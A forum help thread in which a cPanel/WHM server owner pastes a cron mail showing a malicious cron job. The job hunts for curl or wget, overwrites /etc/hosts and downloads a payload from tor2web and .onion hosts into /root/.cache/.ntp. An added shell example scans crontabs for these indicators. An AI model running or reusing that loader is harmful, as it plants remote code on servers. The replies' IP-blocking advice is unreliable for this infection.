
Receiving TOR NETWORK attacks on my CPanel/WHM Linux Server

I'm receiving attacks on my server, every minute. The only information I got is the cron daemon reports from the server.

Find below:
Cron <root@pateng> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /root/.cache/.ntp||${curl}  -fsSLk --retry 2 --connect-timeout 22 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /root/.cache/.ntp||${wget}  --quiet --tries=2 --wait=5 --no

I've already blocked more than 30 IPs on CPanel, and it's still going!
I've even used htaccess to block all IPs except mine, and still nothing.

From the above information, I can extract the following domains:
https://an7kmd2wp4xo7hpr.tor2web.su
https://an7kmd2wp4xo7hpr.tor2web.io
https://an7kmd2wp4xo7hpr.onion.sh

On one of my searches, I've found something in a forum about a security hole in one of the CPanel plugins being actively exploited in the last few hours...

What can I do guys?
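
An added example, not part of this thread: a small POSIX shell check that scans crontab content for the indicators in the cron line quoted above (the tor2web/.onion download hosts, the /root/.cache/.ntp drop path and the /etc/hosts overwrite). The sample crontabs in it are constructed.

```shell
# Added example, not from the thread: scan crontab content for the markers
# of the loader quoted in the question (tor2web/.onion download hosts, the
# /root/.cache/.ntp drop path, the /etc/hosts overwrite). The sample
# crontabs below are constructed for the demonstration.

# One extended-regex alternative per indicator; all are taken from the
# cron line in the question.
TOR_LOADER_PATTERN='tor2web\.|\.onion\.|/root/\.cache/\.ntp|> */etc/hosts'

# scan_cron_file FILE: print matching lines with line numbers,
# exit 0 if anything matched, 1 otherwise (grep's own status).
scan_cron_file() {
    grep -E -n "$TOR_LOADER_PATTERN" "$1"
}

# count_cron_hits FILE: print the number of matching lines (0 when clean).
count_cron_hits() {
    grep -E -c "$TOR_LOADER_PATTERN" "$1" || true
}

# On a live cPanel/WHM host the files to check are the system crontabs
# and every user's spool, for example:
#   for f in /etc/crontab /etc/cron.d/* /var/spool/cron/*; do
#       scan_cron_file "$f" && echo "suspect entries in $f"
#   done
# Here two constructed crontabs stand in for /var/spool/cron/root
# (the paths in the benign lines are illustrative, not real cron jobs).
SAMPLE_INFECTED=$(mktemp)
cat > "$SAMPLE_INFECTED" <<'EOF'
0 3 * * * /usr/local/cpanel/scripts/upcp --cron
* * * * * curl -fsSLk https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /root/.cache/.ntp
* * * * * grep -qi ".onion." /etc/hosts && echo "127.0.0.1 localhost" > /etc/hosts
EOF

SAMPLE_CLEAN=$(mktemp)
cat > "$SAMPLE_CLEAN" <<'EOF'
0 3 * * * /usr/local/cpanel/scripts/upcp --cron
30 2 * * 0 /usr/local/bin/nightly-backup.sh
EOF

scan_cron_file "$SAMPLE_INFECTED"   # lists lines 2 and 3
echo "hits in infected sample: $(count_cron_hits "$SAMPLE_INFECTED")"   # 2
echo "hits in clean sample: $(count_cron_hits "$SAMPLE_CLEAN")"         # 0
```

The cron mails themselves are the tell: a job that runs every minute and mails root is worth reading before any IP blocking, since blocking inbound addresses does nothing about a job already scheduled on the host.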

1 ACCEPTED SOLUTION

Thank you


Zulfiqar Anees | Founder/CEO at FastTech Media, TechMag, TechKnowable, and ZulWeb | GoDaddy Pro.


3 REPLIES
Resolver VI

Hello 

You can permanently block the offending IP with this command (replace xxx.xxx.xxx.xxx with the attacker's IP address).

 

If a software or dedicated hardware firewall isn't available from your host, you can always harden Apache on your web server, which will help your server identify and automatically block malicious connections like these. You'll want to install the mod_reqtimeout module for Apache.

 

Zulfiqar Anees | Founder/CEO at FastTech Media, TechMag, TechKnowable, and ZulWeb | GoDaddy Pro.

I did install the mod_reqtimeout module, and it's still going, now with more than 2k emails from the cron daemon...

Any other ideas?

Much appreciated!
